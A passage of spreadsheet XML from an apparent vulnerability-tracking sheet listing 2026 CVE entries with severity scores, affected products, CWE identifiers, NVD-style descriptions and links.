      <c r="I2550" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2550" s="5" t="inlineStr"/>
      <c r="K2550" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L2550" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 2.1.0 to before version 2.8.1, from version 3.0.0 to before version 3.3.3, and before version 4.0.1, SVGO accepts XML with custom entities, without guards against entity expansion or recursion. This can result in a small XML file (811 bytes) stalling the application and even crashing the Node.js process with JavaScript heap out of memory. This issue has been patched in versions 2.8.1, 3.3.3, and 4.0.1.</t>
        </is>
      </c>
      <c r="M2550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29074</t>
        </is>
      </c>
    </row>
    <row r="2551">
      <c r="A2551" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29181</t>
        </is>
      </c>
      <c r="C2551" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2551" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2551" s="5" t="inlineStr"/>
      <c r="F2551" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2551" s="5" t="inlineStr"/>
      <c r="H2551" s="5" t="inlineStr">
        <is>
          <t>opentelemetry:opentelemetry</t>
        </is>
      </c>
      <c r="I2551" s="5" t="inlineStr">
        <is>
          <t>2026-04-07</t>
        </is>
      </c>
      <c r="J2551" s="5" t="inlineStr"/>
      <c r="K2551" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2551" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify cpu and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0.</t>
        </is>
      </c>
      <c r="M2551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29181</t>
        </is>
      </c>
    </row>
    <row r="2552">
      <c r="A2552" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29785</t>
        </is>
      </c>
      <c r="C2552" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2552" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2552" s="5" t="inlineStr"/>
      <c r="F2552" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2552" s="5" t="inlineStr"/>
      <c r="H2552" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2552" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2552" s="5" t="inlineStr"/>
      <c r="K2552" s="5" t="inlineStr">
        <is>
          <t>CWE-409, CWE-476</t>
        </is>
      </c>
      <c r="L2552" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-29785</t>
        </is>
      </c>
    </row>
    <row r="2553">
      <c r="A2553" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3039</t>
        </is>
      </c>
      <c r="C2553" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2553" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2553" s="5" t="inlineStr"/>
      <c r="F2553" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G2553" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H2553" s="5" t="inlineStr">
        <is>
          <t>isc:bind</t>
        </is>
      </c>
      <c r="I2553" s="5" t="inlineStr">
        <is>
          <t>2026-05-20</t>
        </is>
      </c>
      <c r="J2553" s="5" t="inlineStr"/>
      <c r="K2553" s="5" t="inlineStr">
        <is>
          <t>CWE-770, CWE-771</t>
        </is>
      </c>
      <c r="L2553" s="5" t="inlineStr">
        <is>
          <t>BIND servers that are configured to use TKEY-based authentication via GSS-API tokens are vulnerable to excessive memory consumption when receiving and processing maliciously-constructed packets.  Typically these servers will be found in Active Directory integrated DNS deployments and/or Kerberos-secured DNS environments.
This issue affects BIND 9 versions 9.0.0 through 9.16.50, 9.18.0 through 9.18.48, 9.20.0 through 9.20.22, 9.21.0 through 9.21.21, 9.9.3-S1 through 9.16.50-S1, 9.18.11-S1 through 9.18.48-S1, and 9.20.9-S1 through 9.20.22-S1.</t>
        </is>
      </c>
      <c r="M2553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3039</t>
        </is>
      </c>
    </row>
    <row r="2554">
      <c r="A2554" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30866</t>
        </is>
      </c>
      <c r="C2554" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2554" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2554" s="5" t="inlineStr"/>
      <c r="F2554" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2554" s="5" t="inlineStr"/>
      <c r="H2554" s="5" t="inlineStr"/>
      <c r="I2554" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2554" s="5" t="inlineStr"/>
      <c r="K2554" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="L2554" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, unauthenticated users can access uploaded sensitive via sniffed url. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30866</t>
        </is>
      </c>
    </row>
    <row r="2555">
      <c r="A2555" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30922</t>
        </is>
      </c>
      <c r="C2555" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2555" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2555" s="5" t="inlineStr"/>
      <c r="F2555" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2555" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2555" s="5" t="inlineStr">
        <is>
          <t>pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I2555" s="5" t="inlineStr">
        <is>
          <t>2026-03-18</t>
        </is>
      </c>
      <c r="J2555" s="5" t="inlineStr"/>
      <c r="K2555" s="5" t="inlineStr">
        <is>
          <t>CWE-674, CWE-835</t>
        </is>
      </c>
      <c r="L2555" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.3, the `pyasn1` library is vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding ASN.1 data with deeply nested structures. An attacker can supply a crafted payload containing thousands of nested `SEQUENCE` (`0x30`) or `SET` (`0x31`) tags with "Indefinite Length" (`0x80`) markers. This forces the decoder to recursively call itself until the Python interpreter crashes with a `RecursionError` or consumes all available memory (OOM), crashing the host application. This is a distinct vulnerability from CVE-2026-23490 (which addressed integer overflows in OID decoding). The fix for CVE-2026-23490 (`MAX_OID_ARC_CONTINUATION_OCTETS`) does not mitigate this recursion issue. Version 0.6.3 fixes this specific issue.</t>
        </is>
      </c>
      <c r="M2555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30922</t>
        </is>
      </c>
    </row>
    <row r="2556">
      <c r="A2556" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-3174</t>
        </is>
      </c>
      <c r="C2556" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2556" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2556" s="5" t="inlineStr"/>
      <c r="F2556" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2556" s="5" t="inlineStr"/>
      <c r="H2556" s="5" t="inlineStr"/>
      <c r="I2556" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2556" s="5" t="inlineStr"/>
      <c r="K2556" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2556" s="5" t="inlineStr">
        <is>
          <t>The Event Tickets and Registration plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the Stripe OAuth return endpoint in all versions up to, and including, 5.27.4. This makes it possible for unauthenticated attackers to overwrite the site's Stripe merchant credentials (access tokens, publishable keys, and account ID), diverting all subsequent payment processing to the attacker's Stripe account.</t>
        </is>
      </c>
      <c r="M2556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-3174</t>
        </is>
      </c>
    </row>
    <row r="2557">
      <c r="A2557" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32280</t>
        </is>
      </c>
      <c r="C2557" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2557" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2557" s="5" t="inlineStr"/>
      <c r="F2557" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2557" s="5" t="inlineStr"/>
      <c r="H2557" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2557" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2557" s="5" t="inlineStr"/>
      <c r="K2557" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2557" s="5" t="inlineStr">
        <is>
          <t>During chain building, the amount of work that is done is not correctly limited when a large number of intermediate certificates are passed in VerifyOptions.Intermediates, which can lead to a denial of service. This affects both direct users of crypto/x509 and users of crypto/tls.</t>
        </is>
      </c>
      <c r="M2557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32280</t>
        </is>
      </c>
    </row>
    <row r="2558">
      <c r="A2558" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32283</t>
        </is>
      </c>
      <c r="C2558" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2558" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2558" s="5" t="inlineStr"/>
      <c r="F2558" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2558" s="5" t="inlineStr"/>
      <c r="H2558" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2558" s="5" t="inlineStr">
        <is>
          <t>2026-04-08</t>
        </is>
      </c>
      <c r="J2558" s="5" t="inlineStr"/>
      <c r="K2558" s="5" t="inlineStr">
        <is>
          <t>CWE-764, CWE-770</t>
        </is>
      </c>
      <c r="L2558" s="5" t="inlineStr">
        <is>
          <t>If one side of the TLS connection sends multiple key update messages post-handshake in a single record, the connection can deadlock, causing uncontrolled consumption of resources. This can lead to a denial of service. This only affects TLS 1.3.</t>
        </is>
      </c>
      <c r="M2558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32283</t>
        </is>
      </c>
    </row>
    <row r="2559">
      <c r="A2559" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32285</t>
        </is>
      </c>
      <c r="C2559" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2559" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2559" s="5" t="inlineStr"/>
      <c r="F2559" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2559" s="5" t="inlineStr"/>
      <c r="H2559" s="5" t="inlineStr">
        <is>
          <t>jsonparser_project:jsonparser</t>
        </is>
      </c>
      <c r="I2559" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2559" s="5" t="inlineStr"/>
      <c r="K2559" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-129</t>
        </is>
      </c>
      <c r="L2559" s="5" t="inlineStr">
        <is>
          <t>The Delete function fails to properly validate offsets when processing malformed JSON input. This can lead to a negative slice index and a runtime panic, allowing a denial of service attack.</t>
        </is>
      </c>
      <c r="M2559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32285</t>
        </is>
      </c>
    </row>
    <row r="2560">
      <c r="A2560" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32286</t>
        </is>
      </c>
      <c r="C2560" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2560" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2560" s="5" t="inlineStr"/>
      <c r="F2560" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2560" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="H2560" s="5" t="inlineStr">
        <is>
          <t>jackc:pgproto3</t>
        </is>
      </c>
      <c r="I2560" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2560" s="5" t="inlineStr"/>
      <c r="K2560" s="5" t="inlineStr">
        <is>
          <t>CWE-1285, CWE-129</t>
        </is>
      </c>
      <c r="L2560" s="5" t="inlineStr">
        <is>
          <t>The DataRow.Decode function fails to properly validate field lengths. A malicious or compromised PostgreSQL server can send a DataRow message with a negative field length, causing a slice bounds out of range panic.</t>
        </is>
      </c>
      <c r="M2560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32286</t>
        </is>
      </c>
    </row>
    <row r="2561">
      <c r="A2561" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-32597</t>
        </is>
      </c>
      <c r="C2561" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2561" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2561" s="5" t="inlineStr"/>
      <c r="F2561" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2561" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2561" s="5" t="inlineStr">
        <is>
          <t>pyjwt_project:pyjwt</t>
        </is>
      </c>
      <c r="I2561" s="5" t="inlineStr">
        <is>
          <t>2026-03-13</t>
        </is>
      </c>
      <c r="J2561" s="5" t="inlineStr"/>
      <c r="K2561" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347, CWE-863</t>
        </is>
      </c>
      <c r="L2561" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a JSON Web Token implementation in Python. Prior to 2.12.0, PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 §4.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC. This vulnerability is fixed in 2.12.0.</t>
        </is>
      </c>
      <c r="M2561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-32597</t>
        </is>
      </c>
    </row>
    <row r="2562">
      <c r="A2562" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33216</t>
        </is>
      </c>
      <c r="C2562" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2562" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2562" s="5" t="inlineStr"/>
      <c r="F2562" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2562" s="5" t="inlineStr"/>
      <c r="H2562" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2562" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2562" s="5" t="inlineStr"/>
      <c r="K2562" s="5" t="inlineStr">
        <is>
          <t>CWE-213, CWE-256</t>
        </is>
      </c>
      <c r="L2562" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33216</t>
        </is>
      </c>
    </row>
    <row r="2563">
      <c r="A2563" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33218</t>
        </is>
      </c>
      <c r="C2563" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2563" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2563" s="5" t="inlineStr"/>
      <c r="F2563" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2563" s="5" t="inlineStr"/>
      <c r="H2563" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2563" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2563" s="5" t="inlineStr"/>
      <c r="K2563" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-20</t>
        </is>
      </c>
      <c r="L2563" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33218</t>
        </is>
      </c>
    </row>
    <row r="2564">
      <c r="A2564" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33231</t>
        </is>
      </c>
      <c r="C2564" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2564" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2564" s="5" t="inlineStr"/>
      <c r="F2564" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G2564" s="5" t="inlineStr">
        <is>
          <t>f5, python</t>
        </is>
      </c>
      <c r="H2564" s="5" t="inlineStr">
        <is>
          <t>nltk:nltk</t>
        </is>
      </c>
      <c r="I2564" s="5" t="inlineStr">
        <is>
          <t>2026-03-20</t>
        </is>
      </c>
      <c r="J2564" s="5" t="inlineStr"/>
      <c r="K2564" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L2564" s="5" t="inlineStr">
        <is>
          <t>NLTK (Natural Language Toolkit) is a suite of open source Python modules, data sets, and tutorials supporting research and development in Natural Language Processing. In versions 3.9.3 and prior, `nltk.app.wordnet_app` allows unauthenticated remote shutdown of the local WordNet Browser HTTP server when it is started in its default mode. A simple `GET /SHUTDOWN%20THE%20SERVER` request causes the process to terminate immediately via `os._exit(0)`, resulting in a denial of service. Commit bbaae83db86a0f49e00f5b0db44a7254c268de9b patches the issue.</t>
        </is>
      </c>
      <c r="M2564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33231</t>
        </is>
      </c>
    </row>
    <row r="2565">
      <c r="A2565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33487</t>
        </is>
      </c>
      <c r="C2565" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2565" s="5" t="inlineStr"/>
      <c r="F2565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2565" s="5" t="inlineStr"/>
      <c r="H2565" s="5" t="inlineStr">
        <is>
          <t>goxmldsig_project:goxmldsig</t>
        </is>
      </c>
      <c r="I2565" s="5" t="inlineStr">
        <is>
          <t>2026-03-26</t>
        </is>
      </c>
      <c r="J2565" s="5" t="inlineStr"/>
      <c r="K2565" s="5" t="inlineStr">
        <is>
          <t>CWE-347, CWE-682</t>
        </is>
      </c>
      <c r="L2565" s="5" t="inlineStr">
        <is>
          <t>goxmlsig provides XML Digital Signatures implemented in Go. Prior to version 1.6.0, the `validateSignature` function in `validate.go` goes through the references in the `SignedInfo` block to find one that matches the signed element's ID. In Go versions before 1.22, or when `go.mod` uses an older version, there is a loop variable capture issue. The code takes the address of the loop variable `_ref` instead of its value. As a result, if more than one reference matches the ID or if the loop logic is incorrect, the `ref` pointer will always end up pointing to the last element in the `SignedInfo.References` slice after the loop. goxmlsig version 1.6.0 contains a patch.</t>
        </is>
      </c>
      <c r="M2565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33487</t>
        </is>
      </c>
    </row>
    <row r="2566">
      <c r="A2566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33630</t>
        </is>
      </c>
      <c r="C2566" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2566" s="5" t="inlineStr"/>
      <c r="F2566" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2566" s="5" t="inlineStr"/>
      <c r="H2566" s="5" t="inlineStr"/>
      <c r="I2566" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2566" s="5" t="inlineStr"/>
      <c r="K2566" s="5" t="inlineStr">
        <is>
          <t>CWE-415, CWE-416</t>
        </is>
      </c>
      <c r="L2566" s="5" t="inlineStr">
        <is>
          <t>c-ares is an asynchronous resolver library. From ver 1.32.3 until 1.34.7, a use-after-free / double-free in c-ares' query-completion handling. The same flaw — a query's callback being invoked while the query is still linked in the channel's internal lookup structures — is present at multiple points in the resend/finish path (timeout handling, response handling, and query dispatch). If the query, or for ares_getaddrinfo() the owning host_query, is freed as a side effect of that callback, it is then accessed and/or freed a second time. This vulnerability is fixed in ver 1.34.7.</t>
        </is>
      </c>
      <c r="M2566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33630</t>
        </is>
      </c>
    </row>
    <row r="2567">
      <c r="A2567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33811</t>
        </is>
      </c>
      <c r="C2567" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2567" s="5" t="inlineStr"/>
      <c r="F2567" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2567" s="5" t="inlineStr"/>
      <c r="H2567" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2567" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2567" s="5" t="inlineStr"/>
      <c r="K2567" s="5" t="inlineStr">
        <is>
          <t>CWE-1341, CWE-415</t>
        </is>
      </c>
      <c r="L2567" s="5" t="inlineStr">
        <is>
          <t>When using LookupCNAME with the cgo DNS resolver, a very long CNAME response can trigger a double-free of C memory and a crash.</t>
        </is>
      </c>
      <c r="M2567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33811</t>
        </is>
      </c>
    </row>
    <row r="2568">
      <c r="A2568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33814</t>
        </is>
      </c>
      <c r="C2568" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2568" s="5" t="inlineStr"/>
      <c r="F2568" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2568" s="5" t="inlineStr"/>
      <c r="H2568" s="5" t="inlineStr">
        <is>
          <t>golang:go, golang:http2</t>
        </is>
      </c>
      <c r="I2568" s="5" t="inlineStr">
        <is>
          <t>2026-05-07</t>
        </is>
      </c>
      <c r="J2568" s="5" t="inlineStr"/>
      <c r="K2568" s="5" t="inlineStr">
        <is>
          <t>CWE-606, CWE-835</t>
        </is>
      </c>
      <c r="L2568" s="5" t="inlineStr">
        <is>
          <t>When processing HTTP/2 SETTINGS frames, transport will enter an infinite loop of writing CONTINUATION frames if it receives a SETTINGS_MAX_FRAME_SIZE with a value of 0.</t>
        </is>
      </c>
      <c r="M2568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33814</t>
        </is>
      </c>
    </row>
    <row r="2569">
      <c r="A2569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33870</t>
        </is>
      </c>
      <c r="C2569" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2569" s="5" t="inlineStr"/>
      <c r="F2569" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2569" s="5" t="inlineStr"/>
      <c r="H2569" s="5" t="inlineStr">
        <is>
          <t>netty:netty</t>
        </is>
      </c>
      <c r="I2569" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J2569" s="5" t="inlineStr"/>
      <c r="K2569" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="L2569" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.132.Final and 4.2.10.Final, Netty incorrectly parses quoted strings in HTTP/1.1 chunked transfer encoding extension values, enabling request smuggling attacks. Versions 4.1.132.Final and 4.2.10.Final fix the issue.</t>
        </is>
      </c>
      <c r="M2569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33870</t>
        </is>
      </c>
    </row>
    <row r="2570">
      <c r="A2570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33894</t>
        </is>
      </c>
      <c r="C2570" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2570" s="5" t="inlineStr"/>
      <c r="F2570" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2570" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2570" s="5" t="inlineStr">
        <is>
          <t>digitalbazaar:forge</t>
        </is>
      </c>
      <c r="I2570" s="5" t="inlineStr">
        <is>
          <t>2026-03-27</t>
        </is>
      </c>
      <c r="J2570" s="5" t="inlineStr"/>
      <c r="K2570" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-347</t>
        </is>
      </c>
      <c r="L2570" s="5" t="inlineStr">
        <is>
          <t>Forge (also called `node-forge`) is a native implementation of Transport Layer Security in JavaScript. Prior to version 1.4.0, RSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low public exponent keys (e=3). Attackers can forge signatures by stuffing “garbage” bytes within the ASN structure in order to construct a signature that passes verification, enabling Bleichenbacher style forgery. This issue is similar to CVE-2022-24771, but adds bytes in an addition field within the ASN structure, rather than outside of it.  Additionally, forge does not validate that signatures include a minimum of 8 bytes of padding as defined by the specification, providing attackers additional space to construct Bleichenbacher forgeries. Version 1.4.0 patches the issue.</t>
        </is>
      </c>
      <c r="M2570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33894</t>
        </is>
      </c>
    </row>
    <row r="2571">
      <c r="A2571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-34355</t>
        </is>
      </c>
      <c r="C2571" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
